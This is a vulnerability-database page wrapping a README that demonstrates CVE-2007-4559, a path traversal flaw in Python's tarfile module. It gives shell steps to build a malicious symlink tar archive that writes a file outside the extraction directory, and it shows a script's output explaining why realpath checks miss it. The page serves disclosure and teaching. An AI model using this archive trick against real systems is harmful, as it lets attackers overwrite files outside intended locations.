关联漏洞
标题:
Python tarfile 模块路径遍历漏洞
(CVE-2007-4559)
描述:Python是Python基金会的一套开源的、面向对象的程序设计语言。该语言具有可扩展、支持模块和包、支持多种平台等特点。 Python tarfile模块中的(1)extract和(2)extractall函数存在路径遍历漏洞,该漏洞允许用户辅助远程攻击者通过..TAR存档文件中文件名中的(dot dot)序列,该漏洞与CVE-2001-1267相关。
介绍
# demonstration of [CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559)
## what is this?
This is a demonstration of how python's default handling of tar file extraction prior to python v3.11.4 is vulnerable to a simple symlink attack. The instructions below describe how to craft a malicious payload. The script `untar.py` demonstrates how and why the features added in 3.11.4 work - specifically the necessity to invoke something like `os.path.realpath()` before every write for every file. The script employs the exactly same inspection method found in the `extraction filter` feature included in python >= 3.11.4 EXCEPT it does not write the files to disk. As such it shows how `os.path.realpath()` is unable to properly resolve symlinks and thus will allow tar members to be written outside of the intended filesystem location.
## what's here?
* instructions (this file) on how to set up the sandbox and the malicious tar file.
* python script `untar.py` that will demonstrate the 'why' behind the recent implementation of enhanced tar validation in the python tarfile library. Due to how `os.path.realpath()` works, you can't rely on it to resolve symlinks unless those links are already on the filesystem. This means you can't rely on `os.path.realpath()` alone to inspect tar member paths prior to extracting the archive. You must instead call `os.path.realpath()` before every write for every member in the archive to ensure detection of malicious link activity. See [PEP-706](https://peps.python.org/pep-0706/) and [tarfile doc](https://docs.python.org/3/library/tarfile.html#extraction-filters) for more information.
## create environment and malicious tar file
1. create test environment
```
snerd@jess:~$ mkdir -p lab/{lib,target}
```
2. add ./lib folder to tar archive
```
snerd@jess:~$ cd lab
snerd@jess:~/lab$ tar -cvPf terry.tar lib
```
3. replace ./lib directory with a symlink of the same name to "."
```
snerd@jess:~/lab$ rm -rf lib
snerd@jess:~/lab$ ln -s . lib
```
4. add symlink "lib" to archive
```
snerd@jess:~/lab$ tar -rvPf terry.tar lib
```
5. replace symlink "lib" with directory and file
```
snerd@jess:~/lab$ rm lib
snerd@jess:~/lab$ mkdir -p lib/lib
snerd@jess:~/lab$ touch lib/dangerous_file
```
6. add file to archive using relative path
```
snerd@jess:~/lab$ tar -rPvf terry.tar lib/lib/../dangerous_file
```
7. copy tar into target directory
```
snerd@jess:~/lab$ cp terry.tar target/
snerd@jess:~/lab$ cd target/
```
8. unpack tar. "dangerous_file" was unpacked outside the target directory
```
snerd@jess:~/lab/target$ tar -xPvf terry.tar
lib/
lib
lib/lib/../dangerous_file
snerd@jess:~/lab/target$ ls
lib terry.tar
snerd@jess:~/lab/target$ ls ../
dangerous_file lib target terry.tar
```
## use python script
1. download `untar.py` from this repository and put it in the `./lab` directory
2. run the script. note how easy it is to fool `os.path.realpath()` when the malicious symlink has yet to be written to the target filesystem.
```
snerd@jess:~/lab$ python3 untar.py
member name is: lib
dest_path is: /home/snerd/lab/target
target_path is: /home/snerd/lab/target/lib
is_tarslip? False
-*-*-*-*-
member name is: lib
dest_path is: /home/snerd/lab/target
target_path is: /home/snerd/lab/target/lib
is_tarslip? False
-*-*-*-*-
member name is: lib/lib/../dangerous_file
dest_path is: /home/snerd/lab/target
target_path is: /home/snerd/lab/target/lib/dangerous_file
is_tarslip? False
-*-*-*-*-
```
## further reading
* [[Python-Dev] tarfile and directory traversal vulnerability](https://mail.python.org/pipermail/python-dev/2007-August/074290.html)
* [Alert: 15-year-old Python tarfile flaw lurks in 'over 350,000' code projects](https://www.theregister.com/2022/09/22/python_vulnerability_tarfile/)
* [SO post on how to safely extract tar archives prior to new features of python 3.11.4](https://stackoverflow.com/a/10077309)
* [python issue 21109](https://bugs.python.org/issue21109)
* [2022 statement from the longstanding [ret. 2019] maintainer of the tarlib library](https://www.gustaebel.de/lars/CVE-2007-4559.html)
* [implementation for the new extraction filter feature introduced in python 3.11.4](https://github.com/python/cpython/blob/17f994174de9211b2baaff217eeb1033343230fc/Lib/tarfile.py#L718)
文件快照
[4.0K] /data/pocs/4cdb6f3f948fa313c2f5af639b883f2447688d9e
├── [1.0K] LICENSE
├── [4.2K] README.md
└── [ 958] untar.py
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。